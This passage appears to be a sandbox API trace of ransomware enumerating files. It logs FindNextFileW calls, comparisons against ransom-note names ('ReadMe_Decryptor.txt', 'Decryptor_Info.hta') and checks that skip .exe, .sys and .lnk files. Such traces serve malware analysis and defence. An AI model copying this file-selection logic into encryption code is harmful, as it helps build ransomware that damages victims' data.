[0084.772] lstrcmpiW (lpString1="odea63GEmLe0lrnp.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.772] PathFindExtensionW (pszPath="odea63GEmLe0lrnp.lnk") returned=".lnk" [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.772] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b71a60, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3b71a60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3b71a60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x275, dwReserved0=0x0, dwReserved1=0x0, cFileName="OiPhiPq EQyGt8pCeAoV.lnk", cAlternateFileName="OIPHIP~1.LNK")) returned 1 [0084.772] lstrcmpW (lpString1="OiPhiPq EQyGt8pCeAoV.lnk", lpString2=".") returned 1 [0084.772] lstrcmpW (lpString1="OiPhiPq EQyGt8pCeAoV.lnk", lpString2="..") returned 1 [0084.772] lstrcmpiW (lpString1="OiPhiPq EQyGt8pCeAoV.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.772] lstrcmpiW (lpString1="OiPhiPq EQyGt8pCeAoV.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.772] PathFindExtensionW (pszPath="OiPhiPq EQyGt8pCeAoV.lnk") returned=".lnk" [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.772] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.772] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4cffca0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4cffca0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d25e00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x141a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIzt6Y.lnk", cAlternateFileName="")) returned 1 [0084.772] lstrcmpW (lpString1="PIzt6Y.lnk", lpString2=".") returned 1 [0084.772] lstrcmpW (lpString1="PIzt6Y.lnk", lpString2="..") returned 1 [0084.772] lstrcmpiW (lpString1="PIzt6Y.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.772] lstrcmpiW (lpString1="PIzt6Y.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.772] PathFindExtensionW (pszPath="PIzt6Y.lnk") returned=".lnk" [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.773] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44f7260, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe44f7260, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe44f7260, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Plsd3QdB2hEesgH7BEd.flv.lnk", cAlternateFileName="PLSD3Q~1.LNK")) returned 1 [0084.773] lstrcmpW (lpString1="Plsd3QdB2hEesgH7BEd.flv.lnk", lpString2=".") returned 1 [0084.773] lstrcmpW (lpString1="Plsd3QdB2hEesgH7BEd.flv.lnk", lpString2="..") returned 1 [0084.773] lstrcmpiW (lpString1="Plsd3QdB2hEesgH7BEd.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.773] lstrcmpiW (lpString1="Plsd3QdB2hEesgH7BEd.flv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.773] PathFindExtensionW (pszPath="Plsd3QdB2hEesgH7BEd.flv.lnk") returned=".lnk" [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.773] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2aee1c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe2aee1c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2aee1c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1442, dwReserved0=0x0, dwReserved1=0x0, cFileName="PXapwoyUb.lnk", cAlternateFileName="PXAPWO~1.LNK")) returned 1 [0084.773] lstrcmpW (lpString1="PXapwoyUb.lnk", lpString2=".") returned 1 [0084.773] lstrcmpW (lpString1="PXapwoyUb.lnk", lpString2="..") returned 1 [0084.773] lstrcmpiW (lpString1="PXapwoyUb.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.773] lstrcmpiW (lpString1="PXapwoyUb.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.773] PathFindExtensionW (pszPath="PXapwoyUb.lnk") returned=".lnk" [0084.773] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.774] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b82ee0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4b82ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4b82ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x243, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q4jLxFd3p.lnk", cAlternateFileName="Q4JLXF~1.LNK")) returned 1 [0084.774] lstrcmpW (lpString1="Q4jLxFd3p.lnk", lpString2=".") returned 1 [0084.774] lstrcmpW (lpString1="Q4jLxFd3p.lnk", lpString2="..") returned 1 [0084.774] lstrcmpiW (lpString1="Q4jLxFd3p.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.774] lstrcmpiW (lpString1="Q4jLxFd3p.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.774] PathFindExtensionW (pszPath="Q4jLxFd3p.lnk") returned=".lnk" [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.774] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4354340, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4354340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe437a4a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0x0, dwReserved1=0x0, cFileName="q5Hr7lyiRfCApU6C.lnk", cAlternateFileName="Q5HR7L~1.LNK")) returned 1 [0084.774] lstrcmpW (lpString1="q5Hr7lyiRfCApU6C.lnk", lpString2=".") returned 1 [0084.774] lstrcmpW (lpString1="q5Hr7lyiRfCApU6C.lnk", lpString2="..") returned 1 [0084.774] lstrcmpiW (lpString1="q5Hr7lyiRfCApU6C.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.774] lstrcmpiW (lpString1="q5Hr7lyiRfCApU6C.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.774] PathFindExtensionW (pszPath="q5Hr7lyiRfCApU6C.lnk") returned=".lnk" [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.774] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.775] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2593040, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe2593040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2593040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa63, dwReserved0=0x0, dwReserved1=0x0, cFileName="q6wmyGZdOioAEc.lnk", cAlternateFileName="Q6WMYG~1.LNK")) returned 1 [0084.775] lstrcmpW (lpString1="q6wmyGZdOioAEc.lnk", lpString2=".") returned 1 [0084.775] lstrcmpW (lpString1="q6wmyGZdOioAEc.lnk", lpString2="..") returned 1 [0084.775] lstrcmpiW (lpString1="q6wmyGZdOioAEc.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.775] lstrcmpiW (lpString1="q6wmyGZdOioAEc.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.775] PathFindExtensionW (pszPath="q6wmyGZdOioAEc.lnk") returned=".lnk" [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.775] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf61d9a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xdf61d9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf61d9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x19bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="q9PBr.lnk", cAlternateFileName="")) returned 1 [0084.775] lstrcmpW (lpString1="q9PBr.lnk", lpString2=".") returned 1 [0084.775] lstrcmpW (lpString1="q9PBr.lnk", lpString2="..") returned 1 [0084.775] lstrcmpiW (lpString1="q9PBr.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.775] lstrcmpiW (lpString1="q9PBr.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.775] PathFindExtensionW (pszPath="q9PBr.lnk") returned=".lnk" [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.775] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.775] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4308080, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4308080, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4308080, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="qsXQkAbnzEQwB.lnk", cAlternateFileName="QSXQKA~1.LNK")) returned 1 [0084.775] lstrcmpW (lpString1="qsXQkAbnzEQwB.lnk", lpString2=".") returned 1 [0084.775] lstrcmpW (lpString1="qsXQkAbnzEQwB.lnk", lpString2="..") returned 1 [0084.776] lstrcmpiW (lpString1="qsXQkAbnzEQwB.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.776] lstrcmpiW (lpString1="qsXQkAbnzEQwB.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.776] PathFindExtensionW (pszPath="qsXQkAbnzEQwB.lnk") returned=".lnk" [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.776] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ba9040, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ba9040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ba9040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x2697, dwReserved0=0x0, dwReserved1=0x0, cFileName="QZDgmOZTc7o7iXJAMnXT.lnk", cAlternateFileName="QZDGMO~1.LNK")) returned 1 [0084.776] lstrcmpW (lpString1="QZDgmOZTc7o7iXJAMnXT.lnk", lpString2=".") returned 1 [0084.776] lstrcmpW (lpString1="QZDgmOZTc7o7iXJAMnXT.lnk", lpString2="..") returned 1 [0084.776] lstrcmpiW (lpString1="QZDgmOZTc7o7iXJAMnXT.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.776] lstrcmpiW (lpString1="QZDgmOZTc7o7iXJAMnXT.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.776] PathFindExtensionW (pszPath="QZDgmOZTc7o7iXJAMnXT.lnk") returned=".lnk" [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.776] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.776] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3095600, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4fd36c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4fd36c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="raZ1y9Ttf8zoA4.lnk", cAlternateFileName="RAZ1Y9~1.LNK")) returned 1 [0084.776] lstrcmpW (lpString1="raZ1y9Ttf8zoA4.lnk", lpString2=".") returned 1 [0084.776] lstrcmpW (lpString1="raZ1y9Ttf8zoA4.lnk", lpString2="..") returned 1 [0084.776] lstrcmpiW (lpString1="raZ1y9Ttf8zoA4.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.776] lstrcmpiW (lpString1="raZ1y9Ttf8zoA4.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.776] PathFindExtensionW (pszPath="raZ1y9Ttf8zoA4.lnk") returned=".lnk" [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.777] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2a7bda0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe50de060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe50de060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RclyG.lnk", cAlternateFileName="")) returned 1 [0084.777] lstrcmpW (lpString1="RclyG.lnk", lpString2=".") returned 1 [0084.777] lstrcmpW (lpString1="RclyG.lnk", lpString2="..") returned 1 [0084.777] lstrcmpiW (lpString1="RclyG.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.777] lstrcmpiW (lpString1="RclyG.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.777] PathFindExtensionW (pszPath="RclyG.lnk") returned=".lnk" [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.777] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe04d81c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe51041c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe51041c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x303, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming.lnk", cAlternateFileName="")) returned 1 [0084.777] lstrcmpW (lpString1="Roaming.lnk", lpString2=".") returned 1 [0084.777] lstrcmpW (lpString1="Roaming.lnk", lpString2="..") returned 1 [0084.777] lstrcmpiW (lpString1="Roaming.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.777] lstrcmpiW (lpString1="Roaming.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.777] PathFindExtensionW (pszPath="Roaming.lnk") returned=".lnk" [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.777] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.778] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5091da0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe5091da0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe50b7f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1410, dwReserved0=0x0, dwReserved1=0x0, cFileName="rOtq2vO.lnk", cAlternateFileName="")) returned 1 [0084.778] lstrcmpW (lpString1="rOtq2vO.lnk", lpString2=".") returned 1 [0084.778] lstrcmpW (lpString1="rOtq2vO.lnk", lpString2="..") returned 1 [0084.778] lstrcmpiW (lpString1="rOtq2vO.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.778] lstrcmpiW (lpString1="rOtq2vO.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.778] PathFindExtensionW (pszPath="rOtq2vO.lnk") returned=".lnk" [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.778] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3df91c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4cb39e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4cb39e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1373, dwReserved0=0x0, dwReserved1=0x0, cFileName="RW4ArI0Mpd.lnk", cAlternateFileName="RW4ARI~1.LNK")) returned 1 [0084.778] lstrcmpW (lpString1="RW4ArI0Mpd.lnk", lpString2=".") returned 1 [0084.778] lstrcmpW (lpString1="RW4ArI0Mpd.lnk", lpString2="..") returned 1 [0084.778] lstrcmpiW (lpString1="RW4ArI0Mpd.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.778] lstrcmpiW (lpString1="RW4ArI0Mpd.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.778] PathFindExtensionW (pszPath="RW4ArI0Mpd.lnk") returned=".lnk" [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.778] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.778] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d720c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d720c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d720c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x27a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SXVymLvqnxgquigP57Pv.lnk", cAlternateFileName="SXVYML~1.LNK")) returned 1 [0084.778] lstrcmpW (lpString1="SXVymLvqnxgquigP57Pv.lnk", lpString2=".") returned 1 [0084.778] lstrcmpW (lpString1="SXVymLvqnxgquigP57Pv.lnk", lpString2="..") returned 1 [0084.779] lstrcmpiW (lpString1="SXVymLvqnxgquigP57Pv.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.779] lstrcmpiW (lpString1="SXVymLvqnxgquigP57Pv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.779] PathFindExtensionW (pszPath="SXVymLvqnxgquigP57Pv.lnk") returned=".lnk" [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.779] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43a0600, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe43a0600, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe43a0600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa05, dwReserved0=0x0, dwReserved1=0x0, cFileName="tadrq0Tq.lnk", cAlternateFileName="")) returned 1 [0084.779] lstrcmpW (lpString1="tadrq0Tq.lnk", lpString2=".") returned 1 [0084.779] lstrcmpW (lpString1="tadrq0Tq.lnk", lpString2="..") returned 1 [0084.779] lstrcmpiW (lpString1="tadrq0Tq.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.779] lstrcmpiW (lpString1="tadrq0Tq.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.779] PathFindExtensionW (pszPath="tadrq0Tq.lnk") returned=".lnk" [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.779] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.779] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d98220, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d98220, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d98220, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="tD8goI-0GaEVfpr.mkv.lnk", cAlternateFileName="TD8GOI~1.LNK")) returned 1 [0084.779] lstrcmpW (lpString1="tD8goI-0GaEVfpr.mkv.lnk", lpString2=".") returned 1 [0084.779] lstrcmpW (lpString1="tD8goI-0GaEVfpr.mkv.lnk", lpString2="..") returned 1 [0084.779] lstrcmpiW (lpString1="tD8goI-0GaEVfpr.mkv.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.780] lstrcmpiW (lpString1="tD8goI-0GaEVfpr.mkv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.780] PathFindExtensionW (pszPath="tD8goI-0GaEVfpr.mkv.lnk") returned=".lnk" [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.780] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5091da0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe5091da0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe5091da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="tHtip4RVk.lnk", cAlternateFileName="THTIP4~1.LNK")) returned 1 [0084.780] lstrcmpW (lpString1="tHtip4RVk.lnk", lpString2=".") returned 1 [0084.780] lstrcmpW (lpString1="tHtip4RVk.lnk", lpString2="..") returned 1 [0084.780] lstrcmpiW (lpString1="tHtip4RVk.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.780] lstrcmpiW (lpString1="tHtip4RVk.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.780] PathFindExtensionW (pszPath="tHtip4RVk.lnk") returned=".lnk" [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.780] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.780] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf80cb80, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe44d1100, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe44d1100, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="tjRtep--W8 SqtmSnaj.lnk", cAlternateFileName="TJRTEP~1.LNK")) returned 1 [0084.780] lstrcmpW (lpString1="tjRtep--W8 SqtmSnaj.lnk", lpString2=".") returned 1 [0084.780] lstrcmpW (lpString1="tjRtep--W8 SqtmSnaj.lnk", lpString2="..") returned 1 [0084.780] lstrcmpiW (lpString1="tjRtep--W8 SqtmSnaj.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.781] lstrcmpiW (lpString1="tjRtep--W8 SqtmSnaj.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.781] PathFindExtensionW (pszPath="tjRtep--W8 SqtmSnaj.lnk") returned=".lnk" [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f14fe0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4f14fe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4f14fe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x22d, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtegBM.lnk", cAlternateFileName="")) returned 1 [0084.781] lstrcmpW (lpString1="TtegBM.lnk", lpString2=".") returned 1 [0084.781] lstrcmpW (lpString1="TtegBM.lnk", lpString2="..") returned 1 [0084.781] lstrcmpiW (lpString1="TtegBM.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.781] lstrcmpiW (lpString1="TtegBM.lnk", 